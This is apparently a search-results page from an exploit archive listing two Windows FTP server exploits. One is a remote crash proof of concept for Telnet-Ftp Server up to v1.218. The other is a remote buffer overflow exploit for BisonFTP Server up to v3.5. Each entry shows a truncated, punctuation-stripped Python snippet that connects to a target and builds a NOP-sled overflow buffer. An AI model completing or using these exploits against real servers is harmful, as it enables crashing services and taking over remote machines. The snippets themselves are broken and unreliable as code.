2 matches found
Telnet-Ftp Server <= v1.218 Remote Crash PoC
Exploit for windows platform in category dos / poc !/usr/bin/python Telnet-Ftp Server \n" %sys.argv0 sys.exit def checkDefaultUserusername,password: if username == '' and password == '': username = "anonymous" password = "email protected" else: pass return username,password def createUser: userna...
BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit
Exploit for windows platform in category remote exploits !/usr/bin/python BisonFTP Server \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 padding buffer = "\x90" 1092 36...